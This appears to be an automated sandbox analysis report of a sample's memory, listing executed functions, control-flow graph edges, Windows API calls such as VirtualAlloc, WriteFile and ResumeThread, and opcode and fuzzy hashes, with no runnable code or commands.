                                          • Instruction Fuzzy Hash: 06311CD7D0A5C92BD7149A69AC7A5D93BD0AF1130C78B12F6C8AC8F193FD18760AC241

                                          Execution Graph

                                          Execution Coverage:13.9%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:34
                                          Total number of Limit Nodes:3
                                          execution_graph 15981 7ffd9b9fd04a 15982 7ffd9b9fd059 CreateFileTransactedW 15981->15982 15984 7ffd9b9fd268 15982->15984 16002 7ffd9b9fe6da 16005 7ffd9b9fe6eb 16002->16005 16003 7ffd9b9fe815 16010 7ffd9b9fec5a 16003->16010 16005->16003 16006 7ffd9b9fe7db 16005->16006 16007 7ffd9b9fec5a GetSystemInfo 16006->16007 16008 7ffd9b9fe82a 16007->16008 16009 7ffd9b9fe820 16011 7ffd9b9fec65 16010->16011 16012 7ffd9b9fec85 16011->16012 16013 7ffd9b9fed22 GetSystemInfo 16011->16013 16012->16009 16014 7ffd9b9fed85 16013->16014 16014->16009 15973 7ffd9b9ff0f5 15974 7ffd9b9ff11f VirtualAlloc 15973->15974 15976 7ffd9b9ff23f 15974->15976 15977 7ffd9b9fd2f5 15978 7ffd9b9fd36b WriteFile 15977->15978 15980 7ffd9b9fd48f 15978->15980 15998 7ffd9b9fec91 15999 7ffd9b9fec9e GetSystemInfo 15998->15999 16001 7ffd9b9fed85 15999->16001 15985 7ffd9b9fb57d 15986 7ffd9ba614b0 15985->15986 15989 7ffd9ba607d0 15986->15989 15988 7ffd9ba61599 15991 7ffd9ba607db 15989->15991 15990 7ffd9ba6087e 15990->15988 15991->15990 15993 7ffd9ba60897 15991->15993 15994 7ffd9ba608a2 15993->15994 15995 7ffd9ba608ea ResumeThread 15993->15995 15994->15990 15997 7ffd9ba609b4 15995->15997 15997->15990

                                          Executed Functions

                                          Function 00007FFD9B9FD04A Relevance: 1.8, APIs: 1, Instructions: 293COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 881 7ffd9b9fd04a-7ffd9b9fd057 882 7ffd9b9fd059-7ffd9b9fd061 881->882 883 7ffd9b9fd062-7ffd9b9fd128 881->883 882->883 887 7ffd9b9fd12a-7ffd9b9fd141 883->887 888 7ffd9b9fd144-7ffd9b9fd266 CreateFileTransactedW 883->888 887->888 889 7ffd9b9fd268 888->889 890 7ffd9b9fd26e-7ffd9b9fd2f0 888->890 889->890
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4177426108.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9b9f0000_staticfile.jbxd
                                          Similarity
                                          • API ID: CreateFileTransacted
                                          • String ID:
                                          • API String ID: 2149338676-0
                                          • Opcode ID: 4fb6f73b4c3c0e58ec05a2455d951256c46e137dca5118199004412589902f8d
                                          • Instruction ID: daffa44cf4682d0b0c992de875f261060754e7e052452aa152138c7b6bd06673
                                          • Opcode Fuzzy Hash: 4fb6f73b4c3c0e58ec05a2455d951256c46e137dca5118199004412589902f8d
                                          • Instruction Fuzzy Hash: 9B913470909A5C8FDB99DF58C894BE9BBF1FB6A310F1001AED04DE3291DB75A980CB44
                                          Function 00007FFD9B9FD2F5 Relevance: 1.7, APIs: 1, Instructions: 216fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 893 7ffd9b9fd2f5-7ffd9b9fd3c2 896 7ffd9b9fd3ea-7ffd9b9fd48d WriteFile 893->896 897 7ffd9b9fd3c4-7ffd9b9fd3e7 893->897 898 7ffd9b9fd495-7ffd9b9fd4f1 896->898 899 7ffd9b9fd48f 896->899 897->896 899->898
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4177426108.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9b9f0000_staticfile.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: c71b8567934b5a29580bd712ea9ecc8576356f20c74390743d0776f100ed1084
                                          • Instruction ID: 96ee5f0500d76bde477e7c473c62058b4bf4128e50b7264551c89ee9f0a8edeb
                                          • Opcode Fuzzy Hash: c71b8567934b5a29580bd712ea9ecc8576356f20c74390743d0776f100ed1084
                                          • Instruction Fuzzy Hash: D9611470A08A5C8FDB98DF58C895BE9BBF1FB69310F1041AED04DE3291DB74A985CB40
                                          Function 00007FFD9BBE7976 Relevance: 1.7, Strings: 1, Instructions: 452COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 901 7ffd9bbe7976-7ffd9bbe797c 902 7ffd9bbe7986-7ffd9bbe79a4 901->902 903 7ffd9bbe797e-7ffd9bbe7984 901->903 905 7ffd9bbe79a6-7ffd9bbe79b7 902->905 906 7ffd9bbe79b8-7ffd9bbe79e5 902->906 903->902 905->906 909 7ffd9bbe7c9c-7ffd9bbe7d0e 906->909 910 7ffd9bbe79eb-7ffd9bbe79f6 906->910 936 7ffd9bbe7d2b-7ffd9bbe7d3c 909->936 937 7ffd9bbe7d10-7ffd9bbe7d16 909->937 911 7ffd9bbe79fc-7ffd9bbe7a0a 910->911 912 7ffd9bbe7ab4-7ffd9bbe7ab9 910->912 911->909 915 7ffd9bbe7a10-7ffd9bbe7a21 911->915 913 7ffd9bbe7b4d-7ffd9bbe7b57 912->913 914 7ffd9bbe7abf-7ffd9bbe7ac9 912->914 919 7ffd9bbe7b79-7ffd9bbe7b80 913->919 920 7ffd9bbe7b59-7ffd9bbe7b64 913->920 914->909 918 7ffd9bbe7acf-7ffd9bbe7ae3 914->918 921 7ffd9bbe7a89-7ffd9bbe7aa0 915->921 922 7ffd9bbe7a23-7ffd9bbe7a46 915->922 924 7ffd9bbe7b83-7ffd9bbe7b8d 918->924 919->924 938 7ffd9bbe7b6b-7ffd9bbe7b77 920->938 921->909 923 7ffd9bbe7aa6-7ffd9bbe7aae 921->923 925 7ffd9bbe7a4c-7ffd9bbe7a5f 922->925 926 7ffd9bbe7ae8-7ffd9bbe7aed 922->926 923->911 923->912 924->909 927 7ffd9bbe7b93-7ffd9bbe7bab 924->927 930 7ffd9bbe7a63-7ffd9bbe7a87 925->930 926->930 927->909 932 7ffd9bbe7bb1-7ffd9bbe7bc9 927->932 930->921 939 7ffd9bbe7af2-7ffd9bbe7af5 930->939 932->909 934 7ffd9bbe7bcf-7ffd9bbe7c03 932->934 934->909 962 7ffd9bbe7c09-7ffd9bbe7c1c 934->962 942 7ffd9bbe7d3e-7ffd9bbe7d4b 936->942 943 7ffd9bbe7d4d-7ffd9bbe7d70 936->943 940 7ffd9bbe7d18-7ffd9bbe7d29 937->940 941 7ffd9bbe7d71-7ffd9bbe7d8e 937->941 938->919 946 7ffd9bbe7b0b-7ffd9bbe7b18 939->946 947 7ffd9bbe7af7-7ffd9bbe7b07 939->947 940->936 940->937 942->943 946->909 950 7ffd9bbe7b1e-7ffd9bbe7b4c 946->950 947->946 963 7ffd9bbe7c1e-7ffd9bbe7c29 962->963 964 7ffd9bbe7c7f-7ffd9bbe7c90 962->964 963->964 966 7ffd9bbe7c2b-7ffd9bbe7c42 963->966 968 7ffd9bbe7c44-7ffd9bbe7c4f 966->968 969 7ffd9bbe7c53-7ffd9bbe7c75 966->969 968->969 969->964
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d
                                          • API String ID: 0-2564639436
                                          • Opcode ID: 7e7794f530fa99db68471540438836f8f54bc079128c9106f9c18fa1d5343682
                                          • Instruction ID: 7bd6456f859fb7823b114242e43f5de423a033a55b9e57310cff49af1691c724
                                          • Opcode Fuzzy Hash: 7e7794f530fa99db68471540438836f8f54bc079128c9106f9c18fa1d5343682
                                          • Instruction Fuzzy Hash: 80E13231B19A0A4FD758EF28C4A5975B3E1FF94304B1445B9D44AC72EADA39EC43C782
                                          Function 00007FFD9B9FEC5A Relevance: 1.7, APIs: 1, Instructions: 165COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 973 7ffd9b9fec5a-7ffd9b9fec63 974 7ffd9b9fec65-7ffd9b9fec83 973->974 975 7ffd9b9fecad 973->975 979 7ffd9b9fec85-7ffd9b9fec8f 974->979 980 7ffd9b9fec9e-7ffd9b9fecaa 974->980 977 7ffd9b9fecb0-7ffd9b9fed83 GetSystemInfo 975->977 978 7ffd9b9fecaf 975->978 984 7ffd9b9fed8b-7ffd9b9fedbb 977->984 985 7ffd9b9fed85 977->985 978->977 980->975 985->984
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4177426108.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9b9f0000_staticfile.jbxd
                                          Similarity
                                          • API ID: InfoSystem
                                          • String ID:
                                          • API String ID: 31276548-0
                                          • Opcode ID: 15533d9b2efcb1f0d44395305eb2550c4e0581668b03c0a5d474001ab3d71389
                                          • Instruction ID: 0ab5711fa37e8c18e3fbcac2ebaef689d9062b7b0b9cadc04c4d56fb7c76b914
                                          • Opcode Fuzzy Hash: 15533d9b2efcb1f0d44395305eb2550c4e0581668b03c0a5d474001ab3d71389
                                          • Instruction Fuzzy Hash: 5E51B030A09A4C8FDB59EFA8D895AE9BBF0FB59310F00416BD04DD72A2DA356945CB50
                                          Function 00007FFD9BA60897 Relevance: 1.6, APIs: 1, Instructions: 149threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 988 7ffd9ba60897-7ffd9ba608a0 989 7ffd9ba608a2-7ffd9ba608c2 988->989 990 7ffd9ba608ea-7ffd9ba609b2 ResumeThread 988->990 994 7ffd9ba609b4 990->994 995 7ffd9ba609ba-7ffd9ba60a04 990->995 994->995
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4177426108.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9b9f0000_staticfile.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 6952ee395cb3851f2c9a27afbdfeb5c60b836c21e4972aaa0afbb65364184d76
                                          • Instruction ID: f7aff6d49b6170204b597b4cc577eb0e7a1ea80dd4e82197a990f72bac83efb8
                                          • Opcode Fuzzy Hash: 6952ee395cb3851f2c9a27afbdfeb5c60b836c21e4972aaa0afbb65364184d76
                                          • Instruction Fuzzy Hash: 2F414970E08A1C8FDB98EF98D895AEDBBF0FB59310F10416AD40DE7251DA71A985CB40
                                          Function 00007FFD9B9FEC91 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 998 7ffd9b9fec91-7ffd9b9fecad 1001 7ffd9b9fecb0-7ffd9b9fed83 GetSystemInfo 998->1001 1002 7ffd9b9fecaf 998->1002 1006 7ffd9b9fed8b-7ffd9b9fedbb 1001->1006 1007 7ffd9b9fed85 1001->1007 1002->1001 1007->1006
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4177426108.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9b9f0000_staticfile.jbxd
                                          Similarity
                                          • API ID: InfoSystem
                                          • String ID:
                                          • API String ID: 31276548-0
                                          • Opcode ID: 7534c8aa64df24dca5d8f93d983b88acc77e91ebf3661effdacc362a2c15be88
                                          • Instruction ID: 6271bdf112b1e833a5b321b72386aca9a81f6a8c60d78cc06232c4a7c3f3a37e
                                          • Opcode Fuzzy Hash: 7534c8aa64df24dca5d8f93d983b88acc77e91ebf3661effdacc362a2c15be88
                                          • Instruction Fuzzy Hash: 44419E3090DA8C8FDB59DFA8C859AE9BFF0EB5A310F0441AAD04DD72A2CA355845CB11
                                          Function 00007FFD9B9FF0F5 Relevance: 1.4, APIs: 1, Instructions: 195memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1042 7ffd9b9ff0f5-7ffd9b9ff23d VirtualAlloc 1046 7ffd9b9ff245-7ffd9b9ff2a9 1042->1046 1047 7ffd9b9ff23f 1042->1047 1047->1046
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4177426108.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9b9f0000_staticfile.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 3b9241154bc35be7bcaeb4eac2c78ea306f289eedf13be2912affab92f27df4b
                                          • Instruction ID: d8ff34a6be59056be0ec56e16ecf01390c8ee20cc3a41be6be411fb2cfdf0310
                                          • Opcode Fuzzy Hash: 3b9241154bc35be7bcaeb4eac2c78ea306f289eedf13be2912affab92f27df4b
                                          • Instruction Fuzzy Hash: CD512A70A18A5C8FDF58EF58C895BE9BBF0FB6A310F1041AAD04DE3251DB71A981CB41
                                          Function 00007FFD9BBEBCC8 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1050 7ffd9bbebcc8-7ffd9bbebce3 call 7ffd9bbe7eb0 1053 7ffd9bbebce8-7ffd9bbebd13 1050->1053 1057 7ffd9bbebd3c-7ffd9bbebd42 1053->1057 1058 7ffd9bbebd49-7ffd9bbebd4f 1057->1058 1059 7ffd9bbebd15-7ffd9bbebd2e 1058->1059 1060 7ffd9bbebd51-7ffd9bbebd56 1058->1060 1061 7ffd9bbebe25-7ffd9bbebe35 1059->1061 1062 7ffd9bbebd34-7ffd9bbebd39 1059->1062 1063 7ffd9bbebd5c-7ffd9bbebd91 call 7ffd9bbe7eb0 1060->1063 1064 7ffd9bbebc43-7ffd9bbebc88 1060->1064 1070 7ffd9bbebe37 1061->1070 1071 7ffd9bbebe38-7ffd9bbebe85 1061->1071 1062->1057 1064->1058 1068 7ffd9bbebc8e-7ffd9bbebc94 1064->1068 1072 7ffd9bbebc45-7ffd9bbebe1d 1068->1072 1073 7ffd9bbebc96 1068->1073 1070->1071 1084 7ffd9bbebe87 1071->1084 1072->1061 1077 7ffd9bbebcbf-7ffd9bbebcc6 1073->1077 1077->1050 1078 7ffd9bbebc98-7ffd9bbebcb1 1077->1078 1078->1061 1081 7ffd9bbebcb7-7ffd9bbebcbc 1078->1081 1081->1077 1084->1084
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: 73d51db305c00f062093e87baf634ff91595dac4672249f22db686c97b6b49bc
                                          • Instruction ID: 524855c41c16bee0ae68fb645601d1d981d01a393ef69221a64c87ed31988d94
                                          • Opcode Fuzzy Hash: 73d51db305c00f062093e87baf634ff91595dac4672249f22db686c97b6b49bc
                                          • Instruction Fuzzy Hash: 43516931E0954E8FDB69DB98C4B05BDB7B1FF48304F1140BAC01AE72E6DA792A01CB91
                                          Function 00007FFD9BBEC14F Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1085 7ffd9bbec14f-7ffd9bbec155 1086 7ffd9bbec156-7ffd9bbec167 call 7ffd9bbe80e8 1085->1086 1087 7ffd9bbec29f-7ffd9bbec2c7 1085->1087 1089 7ffd9bbec16c-7ffd9bbec177 1086->1089 1091 7ffd9bbec179-7ffd9bbec190 1089->1091 1092 7ffd9bbec1b6-7ffd9bbec1c5 1089->1092 1091->1087 1093 7ffd9bbec196-7ffd9bbec1b2 1091->1093 1092->1087 1094 7ffd9bbec1cb-7ffd9bbec1ef 1092->1094 1093->1091 1095 7ffd9bbec1b4 1093->1095 1096 7ffd9bbec1f2-7ffd9bbec20f 1094->1096 1097 7ffd9bbec232-7ffd9bbec248 1095->1097 1096->1087 1098 7ffd9bbec215-7ffd9bbec230 1096->1098 1097->1087 1099 7ffd9bbec24a-7ffd9bbec24e 1097->1099 1098->1096 1098->1097 1100 7ffd9bbec252-7ffd9bbec259 1099->1100 1101 7ffd9bbec25f-7ffd9bbec285 1100->1101 1102 7ffd9bbec12d-7ffd9bbec133 1100->1102 1102->1087 1103 7ffd9bbec139-7ffd9bbec148 1102->1103 1103->1100 1104 7ffd9bbec14e 1103->1104 1104->1085
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: A
                                          • API String ID: 0-2078354741
                                          • Opcode ID: fd26bc8e8d61005d85a889a358d7cb8e8d2342de906cd01192eeaa88ff0ff0c2
                                          • Instruction ID: d619e61dc891fff8f7e78fe6ae6a94d931bc20547d98e85d76d2c4a07a40e184
                                          • Opcode Fuzzy Hash: fd26bc8e8d61005d85a889a358d7cb8e8d2342de906cd01192eeaa88ff0ff0c2
                                          • Instruction Fuzzy Hash: 5951E7306196498FEB89CF58C0E06B03BA1FF55314B9456FDC84ACB69BD778E482CB81
                                          Function 00007FFD9BBE5828 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1105 7ffd9bbe5828-7ffd9bbe5843 call 7ffd9bbe1638 1108 7ffd9bbe5848-7ffd9bbe5873 1105->1108 1112 7ffd9bbe589c-7ffd9bbe58a2 1108->1112 1113 7ffd9bbe58a9-7ffd9bbe58af 1112->1113 1114 7ffd9bbe5875-7ffd9bbe588e 1113->1114 1115 7ffd9bbe58b1-7ffd9bbe58b6 1113->1115 1116 7ffd9bbe5985-7ffd9bbe5995 1114->1116 1117 7ffd9bbe5894-7ffd9bbe5899 1114->1117 1118 7ffd9bbe58bc-7ffd9bbe58f1 call 7ffd9bbe1638 1115->1118 1119 7ffd9bbe57a3-7ffd9bbe57e8 1115->1119 1126 7ffd9bbe5998-7ffd9bbe59a7 1116->1126 1127 7ffd9bbe5997 1116->1127 1117->1112 1119->1113 1123 7ffd9bbe57ee-7ffd9bbe57f4 1119->1123 1128 7ffd9bbe57f6 1123->1128 1129 7ffd9bbe57a5-7ffd9bbe597d 1123->1129 1127->1126 1131 7ffd9bbe581f-7ffd9bbe5826 1128->1131 1129->1116 1131->1105 1133 7ffd9bbe57f8-7ffd9bbe5811 1131->1133 1133->1116 1134 7ffd9bbe5817-7ffd9bbe581c 1133->1134 1134->1131
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: f53a9360d59c2959c7dead2b500a04c9b9741f1a39acbf0ad66afca7c5a4559c
                                          • Instruction ID: ec4efc0aaaabcd6ec9d970496f8161aabb55040cabdf623dee46bb548b5e4b5c
                                          • Opcode Fuzzy Hash: f53a9360d59c2959c7dead2b500a04c9b9741f1a39acbf0ad66afca7c5a4559c
                                          • Instruction Fuzzy Hash: 84411670E0960E8FDB59DF94C4A45FDB7B1FF54304F1141BAC01AA72E6CA396A41CB81
                                          Function 00007FFD9BBE9C50 Relevance: .7, Instructions: 692COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9623bb1d57bc73efd853aeaf10d53adce6c8c1cef12c50679506df4062257336
                                          • Instruction ID: ed613636d1f8ac5e4351e242d71cfe1b502378887ab865107775443c5aeba7b1
                                          • Opcode Fuzzy Hash: 9623bb1d57bc73efd853aeaf10d53adce6c8c1cef12c50679506df4062257336
                                          • Instruction Fuzzy Hash: 9332B630B09A1D8FDBA8DB58C8A9A6877E2FF55314B1141B9D04EC72F2DE34AD45CB81
                                          Function 00007FFD9BBE5A9F Relevance: .4, Instructions: 369COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a96108e0e78633def75bd7ea07bee142c6d9987d54b2f9fc6664107301f5c610
                                          • Instruction ID: e6ac70d67519921c94d81990d00d301d70e2d45bdbf13d0b71f08d0de8078d8a
                                          • Opcode Fuzzy Hash: a96108e0e78633def75bd7ea07bee142c6d9987d54b2f9fc6664107301f5c610
                                          • Instruction Fuzzy Hash: 7FD1CF3061955A8FEB58CF48C4E45B437A1FF45314B5546BDC84B8B6EBCA38F982CB82
                                          Function 00007FFD9BBE5ABF Relevance: .3, Instructions: 340COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 951a17444b5093bdcf830b40d3a201b0b9ca51dc9190503e3cdbfafb0f43bcb1
                                          • Instruction ID: ef925555ce7c98380fdb902c665046d35dc1f6d18df33be823d518983950de9b
                                          • Opcode Fuzzy Hash: 951a17444b5093bdcf830b40d3a201b0b9ca51dc9190503e3cdbfafb0f43bcb1
                                          • Instruction Fuzzy Hash: 11C1F53061954A8BEB2DCF58C4E05B537A1FF45314B5545BDC84B8B6EBCA38F582CB82
                                          Function 00007FFD9BC01DFE Relevance: .3, Instructions: 286COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f3969701b5d0b973f6454ff34b3463c02741c9d1418afd161cebf82de1568b2
                                          • Instruction ID: e729a83c439666e5e12063325b320f7f5db01f4b4aa3796dbb37ccd6292f2767
                                          • Opcode Fuzzy Hash: 2f3969701b5d0b973f6454ff34b3463c02741c9d1418afd161cebf82de1568b2
                                          • Instruction Fuzzy Hash: C3A1D43061965A8FEB59CF58C0E05B87BB1FF45310B5542BDD88ACB59BD638F981CB80
                                          Function 00007FFD9BBE2328 Relevance: .3, Instructions: 275COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5569da39949b746fee0955fbc02045c7f5f08aa4c69f1a90d3b5090a218166c3
                                          • Instruction ID: c366101c7ca472581533b814673566dd27be3eb4232197beeed29eebd0d7a09b
                                          • Opcode Fuzzy Hash: 5569da39949b746fee0955fbc02045c7f5f08aa4c69f1a90d3b5090a218166c3
                                          • Instruction Fuzzy Hash: C391E770A0991D8FDFA4EF98C495AEDBBF1FF58305F11016AD00DE72A1DA34A985CB81
                                          Function 00007FFD9BBE29F1 Relevance: .2, Instructions: 250COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 794704b105c972f1ac889177570461b2c79b1b7a3c3a9b51fb64c5e8ba7f23d0
                                          • Instruction ID: 6bc4fe3281321cfb2a9eccd27b1f6adf44d672f8b1f8a33792f9e7d8b000bc60
                                          • Opcode Fuzzy Hash: 794704b105c972f1ac889177570461b2c79b1b7a3c3a9b51fb64c5e8ba7f23d0
                                          • Instruction Fuzzy Hash: CD712230B0D54E4FDBB8DA98C8616AC33D1FF48315B160279D44EC75F1CA28A906C3C2
                                          Function 00007FFD9BBE9169 Relevance: .2, Instructions: 244COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b380074e5381ed4b786fc34033c4077a2b90a41c7021f1b1ef4f05d2d6537145
                                          • Instruction ID: 063da7a9f781eabfbefad1c7ff5f9f86f53e42561776f7e4c29cf46f5cb9c02d
                                          • Opcode Fuzzy Hash: b380074e5381ed4b786fc34033c4077a2b90a41c7021f1b1ef4f05d2d6537145
                                          • Instruction Fuzzy Hash: 4671D431A0D94D4FDB78DA58886A5BC37D0FF44314B1602B9D49EC75F2D928AA1E87C3
                                          Function 00007FFD9BBE9A3B Relevance: .2, Instructions: 234COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b7b1d20a9f3e28f8485461a54bf4baf333ed9b08e9d39895105e1481f571764f
                                          • Instruction ID: 58c1e2628c5fca7f1710c4960bd506c52f7bb1d1b98df35bce8f4d945c173ae4
                                          • Opcode Fuzzy Hash: b7b1d20a9f3e28f8485461a54bf4baf333ed9b08e9d39895105e1481f571764f
                                          • Instruction Fuzzy Hash: 6771C330A1E64E8FEB69DBA488686BC77E0FF45304F1101BAD04EC71F2DA796945C782
                                          Function 00007FFD9BBE7779 Relevance: .2, Instructions: 224COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.4179448939.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_7ffd9bbe0000_staticfile.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 476ea4185e8e432f121bdb55b88e9f941b61dc0ed692ded209ca96422f35a6ec
                                          • Instruction ID: c459d49d163cbf139c45e22d8e34b635352173748dbf2c411c2e8bf03ac2b490
                                          • Opcode Fuzzy Hash: 476ea4185e8e432f121bdb55b88e9f941b61dc0ed692ded209ca96422f35a6ec
                                          • Instruction Fuzzy Hash: 9E51083260EB494FE76A8A6A98955707BE0FF6631471502BEC08DC71B3D929F843C782
                                          Function 00007FFD9BBECF81 Relevance: .2, Instructions: 222COMMON
                                          Download Yara Rule
                                          Memory Dump Source
